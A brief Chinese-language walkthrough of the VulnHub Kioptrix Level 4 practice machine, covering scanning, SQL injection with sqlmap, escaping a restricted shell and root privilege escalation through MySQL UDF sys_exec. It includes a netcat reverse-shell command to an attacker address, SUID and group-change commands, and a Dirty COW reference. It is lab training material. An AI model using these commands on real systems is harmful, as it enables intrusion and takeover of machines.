VulnHub-Kioptrix-Level 4

netdiscover -i eth0 发现靶机

nitko扫到database.sql，尝试登陆

nmap -sV 看看有哪些服务

使用enum4linux查看目标主机可能存在的用户信息，发现了john

使用sqlmap跑BurpSuite的抓包，控制用户名为john，获取密码（sqlmap的清除缓存用–purge）

两个账户登陆后并没有什么有用的信息，因有22端口的ssh，所以试了一下

john和robert用户都禁用了很多命令，根据提示用？查看可用命令

这里猜测这个受限的shell是Python实现的，因此使用echo os.system开一个新shell

靶机限制了对80端口的访问，开一个8882端口传LinEnum.sh

提权

方法一：参考Level3的脏牛

方法二：LinEnum发现SOFTWARE部分有无密码且root的MySQL

登录Mysql：mysql -uroot

尝试使用UDF提权，满足两个条件①Mysql版本大于5②存在lib_mysqludf_sys（不存在需要手工添加）

有三种方法①利用root构建一个SUID②利root创建一个反弹shell③利用root将当前用户加入管理员组

①sys_exec(‘chmod u+s /usr/bin/find’)

②SELECT sys_exec(“/bin/nc.traditional -e /bin/sh 192.168.1.105 1234”);

③SELECT sys_exec(“usermod -a -G admin robert”);

exit退出mysql后sudo su – 更新权限，拿到root